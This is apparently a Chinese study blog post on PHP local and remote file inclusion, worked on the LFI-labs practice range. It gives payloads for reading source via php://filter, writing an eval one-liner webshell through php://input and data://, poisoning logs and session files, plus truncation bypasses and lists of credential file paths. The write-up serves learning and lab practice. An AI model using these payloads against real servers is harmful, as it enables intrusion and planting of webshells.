文件包含 & LFI-labs靶场
文件包含漏洞学习
冲冲冲,好好学习 2020.1.30 认真对待自己做出的每一个决定
知识与实践
Q:什么是文件包含?
A:简单一句话,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,
直接使用包含文件的代码。
Q:文件包含漏洞的成因是什么?
A:在包含文件时候,为了灵活包含文件,将被包含文件设置为变量,通过动态变量来引入需要包含的文件时,
用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞。通常文件包含漏洞出现在PHP语言中。
文件包含函数:(读取文件和执行)
include:
include_once:遇到重复我文件,只包含一次
require:
require_once: 遇到重复我文件,只包含一次
highlight_file、show_source、readfile、file_get_contents、fopen、file (读取文件)
include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序的执行。
而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。
文件包含漏洞分类
- 本地文件包含
- 远程文件包含
两个配置文件
allow_url_fopen:为ON时,能读取远程文件,例如file_get_contents()就能读远程文件
allow_url_include:为ON时,就可使用include和require等方式包含远程文件
常见的敏感信息路径
Windows系统
c:\boot.ini #查看系统版本
c:\windows\system32\inetsrv\MetaBase.xml # IIS配置文件
c:\windows\repair\sam # 存储Windows系统初次安装的密码
c:\ProgramFiles\mysql\my.ini # MySQL配置
c:\ProgramFiles\mysql\data\mysql\user.MYD # MySQL root密码
c:\windows\php.ini # php 配置信息
Linux/Unix系统
/etc/passwd # 账户信息
/etc/shadow # 账户密码文件
/usr/local/app/apache2/conf/httpd.conf # Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf # 虚拟网站配置
/usr/local/app/php5/lib/php.ini # PHP相关配置
/etc/httpd/conf/httpd.conf # Apache配置文件
/etc/my.conf # mysql 配置文件
文件包含漏洞的利用方式---伪协议
php:// 输入输出流
PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。
php://filter(本地磁盘文件进行读取)
元封装器,设计用于”数据流打开”时的”筛选过滤”应用,对本地磁盘文件进行读写。
用法如下:
?filename=php://filter/convert.base64-encode/resource=xxx.php
?filename=php://filter/read=convert.base64-encode/resource=xxx.php
一样。
条件:只是读取,需要开启 allow_url_fopen,不需要开启 allow_url_include;
测试代码:
<?php
$filename = $_GET['filename'];
include($filename);?>
第一个参数:resource=<要过滤的数据流> 其实可以理解成文件名。
Example #2 php://filter/resource=<待过滤的数据流>
这个参数必须位于 php://filter 的末尾,并且指向需要过滤筛选的数据流。
Example #3 php://filter/read=<读链需要应用的过滤器列表>
这个参数采用一个或以管道符 | 分隔的多个过滤器名称。
Example #4 php://filter/write=<写链需要应用的过滤器列表>
这个参数采用一个或以管道符 | 分隔的多个过滤器名称。
Example #5 php://memory 和 php://temp 是一次性的
php://memory 和 php://temp 是一次性的,比如:stream 流关闭后,就无法再次得到以前的内容了。
应用题:?file=php://filter/read=convert.base64-encode/resource=flag.php
这是CTF里的一道题,先看看源码是什么,发现个 链接到另一个文件 ?file=flag.php ,这时候不如把两个PHP文件的源码读出来看,
?file=php://filter/read=convert.base64-encode/resource=.....
把resource=后面的 用base64编码读出来
再用bp解码
成功得 flag 。
php://input
可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。 enctype=”multipart/form-data” 的时候 php://input 是无效的。
用法:?file=php://input 数据利用POST传过去
php://input (读取POST数据)
碰到file_get_contents()
就要想到用php://input
绕过,因为php伪 也是可以利用http协议的,即可以使用POST方式传数据,具体函数意义下一项;
通过input获取webs hell
写入一句话木马<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>
再上菜刀搞定。
用 fputs()函数写入,下面两个函数具体用法可以去查查。
php://input(写入木马)
测试代码:
<?php
$filename = $_GET['filename'];
include($filename);
?>
条件:php配置文件中需同时开启 allow_url_fopen 和 allow_url_include(PHP < 5.3.0),就可以造成任意代码执行,在这可以理解成远程文件包含漏洞(RFI),即POST过去PHP代码,即可执行。
如果POST的数据是执行写入一句话木马的PHP代码,就会在当前目录下写入一个木马。
<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>
php://output
php://output 是一个只写的数据流, 允许你以 print 和 echo 一样的方式 写入到输出缓冲区。
php://fd
php://fd 允许直接访问指定的文件描述符。 例如 php://fd/3 引用了文件描述符 3。
php://zip
使用要指定绝对路径。
伪协议的 data://
利用方式一般有两种(注意一些小细节:区分符号)
下面以打开phpinfo为例。注意,下面黄色的斜杠//是可以省略的,因为在语法上都是对的。
- 直接写入代码:
格式:data://text/plain,
例:http://127.0.0.1:10004/php/php_data.php?file=data://text/plain,<?php phpinfo(); ?>
- 使用base64编码:
格式:data://text/plain;base64,编码后的php代码
例:(前面的内容省略)?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
有一点要注意的问题,base64编码后的加号和等号要手动的url编码,否则无法识别。
<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[hacker])?>');?>
思路就是:用fputs()函数写入一句话木马(shell.php) ——> URL访问该木马文件看有无返回404,无,则应该上传成功 ——> 上菜刀
文件包含漏洞的利用方式---其他
- 00截断:系统在读取遇到 00 就会认为这是结束标志而停止读取,有 %00截断和0x00截断。
- 长度截断( windows最大读取长度是256; linux 最大读取长度4096 )
- 包含日志文件:有些文件会保存在日志里,如 URL,时间,... ,假如在URL里面加入一句话木马,就可利用日志搞事情了。
- 包含session:
细讲:
session文件包含漏洞
利用条件:
session的存储位置可以获取。
通过phpinfo的信息可以获取到session的存储位置。
通过phpinfo的信息,获取到session.save_path为/var/lib/php/session:
通过猜测默认的session存放位置进行尝试。
如linux下默认存储在/var/lib/php/session目录下:
session中的内容可以被控制,传入恶意代码。
示例:
<?php
session_start();
$ctfs=$_GET['ctfs'];
$_SESSION["username"]=$ctfs;
?>
漏洞分析
此php会将获取到的GET型ctfs变量的值存入到session中。
当访问http://www.ctfs-wiki/session.php?ctfs=ctfs 后,会在/var/lib/php/session目录下存储session的值。
session的文件名为sess_+sessionid,sessionid可以通过开发者模式获取。
所以session的文件名为sess_akp79gfiedh13ho11i6f3sm6s6。
到服务器的/var/lib/php/session目录下查看果然存在此文件,内容为:
username|s:4:"ctfs";
[root@c21336db44d2 session]# cat sess_akp79gfiedh13ho11i6f3sm6s6
username|s:4:"ctfs"
漏洞利用
通过上面的分析,可以知道ctfs传入的值会存储到session文件中,如果存在本地文件包含漏洞,就可以通过ctfs写入恶意代码到session文件中,然后通过文件包含漏洞执行此恶意代码getshell。
当访问http://www.ctfs-wiki/session.php?ctfs=后,会在/var/lib/php/session目录下存储session的值。
[root@6da845537b27 session]# cat sess_83317220159fc31cd7023422f64bea1a
username|s:18:"";
攻击者通过phpinfo()信息泄露或者猜测能获取到session存放的位置,文件名称通过开发者模式可获取到,然后通过文件包含的漏洞解析恶意代码getshell。
在LFI-3出现了个PHP函数:file_get_contents() 函数
定义和用法:
file_get_contents() 把整个文件读入一个字符串中。它只是读取文件,而不执行。
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。
语法:file_get_contents(path,include_path,context,start,max_length)
参数 描述
path 必需。规定要读取的文件。
include_path 可选。如果您还想在 include_path(在 php.ini 中)中搜索文件的话,请设置该参数为 '1'。
context 可选。规定文件句柄的环境。context 是一套可以修改流的行为的选项。若使用 NULL,则忽略。
start 可选。规定在文件中开始读取的位置。该参数是 PHP 5.1 中新增的。
max_length 可选。规定读取的字节数。该参数是 PHP 5.1 中新增的。
介绍个函数:addslashes() 就像是在SQL注入里的把 union 和select 替换成空一样的解决思路, 在中间再插入 ununionion
定义和用法
addslashes() 函数返回在预定义的字符前添加 \ (反斜杠)的字符串。
预定义字符是:
单引号(')
双引号(")
反斜杠(\)
NULL
提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备合适的字符串。
注释:默认情况下,PHP 指令 magic_quotes_gpc 为 on,对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导致双层转义。遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。
语法:addslashes(string)
参数:string (必须的参数)
PHP版本4+使用 。
返回值:返回已转义的字符串。
下面开始直接跳到实战环节
第一类是 GET方式的:
Include($_GET[‘hacker’]);
第二类是 POST方式的:
Include($_POST[‘hacker’]);
火狐浏览器的HackBar的地址栏只能使出get类型的参数:
注意,URL最后一定要以斜杠结尾 / ,上图的URL就不对了,应该是
GET类型的参数是直接出现在URL里面的,而POST类型的参数就要在这里用了:
POST 类型,不能直接上菜刀,要先写入一句话木马,再文件包含。
第二种利用方式:利用文件包含日志获取shell
要知道,这都是默认的路径,是在很理想的环境下才能遇到的。在陌生环境是很难猜到日志文件的路径的,而且遇上有较强安全意识的管理员就更难了。
先介绍日志默路径:
(1)Apache+linux 日志默认路径
/etc/http/logs/access_log
or
/var/log/http/access_log
(2)Apache+win2003日志默路径
D:\xampp\apache\logs\access.log
D:\xampp\apache\logs\error.log
(3)IIS6.0+2003默认日志文件
C:\WINDOWS\system32\Logfiles
(4)IIS7.0+win2003 默认日志文件
%SystemDrive%\inetpub\logs\LogFiles
(5)nginx日志文件
日志文件在用户安装logs目录下
例如:/usr/local/nginx
那对应的日志目录就在/usr/local/nginx/logs 里
例子:现在本机的phpstudy的apache的日志文件目录如下:
C:\phpStudy\PHPTutorial\Apache\logs\error.log
要获取webshell的话,就必须要有一句话木马之类的,所以要先把一句话木马写进日志文件里。
Attention:当我们进入了日志文件之后,执行了这个
URL:http://127.0.0.1:10003/LFI-1/?page=C:\phpStudy\PHPTutorial\Apache\logs\error.log
之后,当前位置就在日志文件里了,再
再次访问日志文件:
就会看到,phpinfo.php已经别写进去了日志文件里,但是发现它并没有执行,PHPinfo的页面也没有显示出来,因为写进去的代码被浏览器进过了 默认的URL编码。那要怎么解决呢,想要达到的目的是,把不经过编码直接写代码进去---用bp改包。 因为bp能绕过浏览器的URL默认编码。
首先访问日志,再把URL改一下,改一下(如上图),然后开启bp抓包,再用改完后的URL刷新网页,
抓到这个包,把phpinfo代码加进去,然后send ,完成。没经过URL编码的代码就写进日志文件里了。
关闭抓包代理,再次访问日志文件:
看到,phpinfo()代码执行了就显示出来了。
同理的,phpinfo能写进去执行,那一句话木马也应该能写进去的吧,来试一下:
把一句话木马写进了日志文件,再拿访问日志文件的URL,丄菜刀。
成功。整个的思路就是这样子.
当 php5.3(应该是5.3)之后的版本,%00 截断就用不了了。那我们可以用另一个方法来替代 %00截断——win/Linux 的特性。
上图:
这里后面会加 .html 导致无法正常执行输入的代码,那就利用win/Linux的读取长度限制,include输入的是文件名,系统读取文件名有长度限制,win下最大长度 256 ,Linux则是4096 ,且win下的文件名是不能使用这些字符的,或者使用点号 . (文件名后缀后面的点号会被自动过滤掉),但是他们也是占着长度的。那就可以在输入page=文件名 在后面不上几百个 点号 . 或者 ./ 也行 然后 后面的 .html 就会超过长度被丢弃掉而不起作用了。
在Linux里就用 点号 . 长度超过4096 就行。
完结。2020.2.13 Bitores
文件包含 & LFI-labs靶场的更多相关文章
- 文件包含lfi
CG-CTF web(文件包含漏洞) 参考链接:https://blog.csdn.net/qq_34072526/article/details/89431431 php://filter 的使用: ...
- 本地文件包含(LFI)漏洞
PHP file://封装 PHP php://filter PHP ZIP封装LFI 通过/proc/self/environ执行LFI 空字节技术 截断LFI绕过 通过邮件给目标机器发送一个反弹s ...
- 小白日记37:kali渗透测试之Web渗透-手动漏洞挖掘(三)-目录遍历、文件包含
手动漏洞挖掘 漏洞类型 #Directory traversal 目录遍历[本台机器操作系统上文件进行读取] 使用者可以通过浏览器/URL地址或者参数变量内容,可以读取web根目录[默认为:/var/ ...
- PHP:文件包含漏洞
简单记录一些文件包含漏洞的常用方法 产生原因: 文件包含漏洞的产生原因是在通过引入文件时,由于传入的文件名没有经过合理的校验,或者校检被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意 ...
- php本地文件包含 Writeup
目录 本地文件包含 LFI本地文件包含案例一 LFI本地文件包含案例二 本地文件包含简介 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码. ...
- DVWA靶场之File Inclusion(文件包含)通关
文件包含,未经过严格过滤,将一些恶意构造带入了包含函数,可以使用一些包含函数来包含一些其他乱七八糟的东西,要么导致任意文件读取,要么命令执行 文件包含包括远程文件包含(RFI)和本地文件包含(LFI) ...
- 本地文件包含漏洞(LFI漏洞)
0x00 前言 本文的主要目的是分享在服务器遭受文件包含漏洞时,使用各种技术对Web服务器进行攻击的想法. 我们都知道LFI漏洞允许用户通过在URL中包括一个文件.在本文中,我使用了bWAPP和DVW ...
- 渗透测试之本地文件包含(LFI)
一.本地文件包含 本地文件包含漏洞指的是包含本地的php文件,而通过PHP文件包含漏洞入侵网站,可以浏览同服务器所有文件,并获得webshell. 看见?page=标志性注入点,提示我们输入?=pag ...
- 组合拳 | 本地文件包含漏洞+TFTP=Getshell
文章声明 安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作. 本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转 ...
随机推荐
- Linux分区,格式化概念理解
一.分区概念: 逻辑上分成不同的存储空间. 分区类型: 主分区:最多只能有4个 扩展分区:最多只能有1个. 主分区加扩展分区最多有4个. 布恩那个写入数据,只能包含逻辑分区 逻辑分区: 主分区为什么只 ...
- Java知识复习(三)
Set里的元素是不能重复的,那么用什么方法来区分重复与否呢? 是用==还是equals()? 它们有何区别?用contains来区分是否有重复的对象.还是都不用. 在比较时先调用hashCode方法, ...
- 入“坑”mybatis后如何挣脱?
既然已经入"坑"mybatis了,你竟然还想着挣脱,我是不会让你挣脱的~ 当然我有一个算是挣脱的办法.那就是把它学会.理解透.这样我们也就不用在坑里一直徘徊,也算得上是一种挣脱吧! ...
- 合肥某小公司面试题:Spring基础
<对线面试官>系列目前已经连载25篇啦!有深度风趣的系列! [对线面试官]Java注解 [对线面试官]Java泛型 [对线面试官] Java NIO [对线面试官]Java反射 & ...
- javascript的getTime函数
<!DOCTYPE HTML><html><head><meta http-equiv="Content-Type" content=&q ...
- 12、关于系统cpu的计算
1.cpu核数和逻辑cpu: CPU总核数 = 物理CPU个数 * 每颗物理CPU的核数: 总逻辑CPU数 = 物理CPU个数 * 每颗物理CPU的核数 * 超线程数 2.查看linux的cpu相关信 ...
- 配置Oracle遇到问题<一>
1, 将D:\app\product\11.2.0\dbhome_1\NETWORK复制到D:\app\product\instantclient_11_2.为了处理: 12154错误,不过没有解决. ...
- webpack(6)webpack处理图片
图片处理url-loader(webpack5之前的处理方式) 在项目开发中,我们时长会需要使用到图片,比如在img文件夹中有图片test1.png,然后在normal.css中会引用到图片 body ...
- Hibernate框架(二)POJO对象的操作
POJO对象其实就是我们的实体,这篇博客总结一下框架对POJO对象对应数据库主键的生成策略,和一些对POJO对象的简单增删改查的操作. 一,Hibernate框架中主键的生成策略有三种方式: 1,数据 ...
- Laravel使用Observer(观察者)
1.创建observer文件,我这里是要记录仓库库存模块的操作日志,所以执行下面的语句,会在app/Observers下面创建WarehouseInventoryObserver文件. php a ...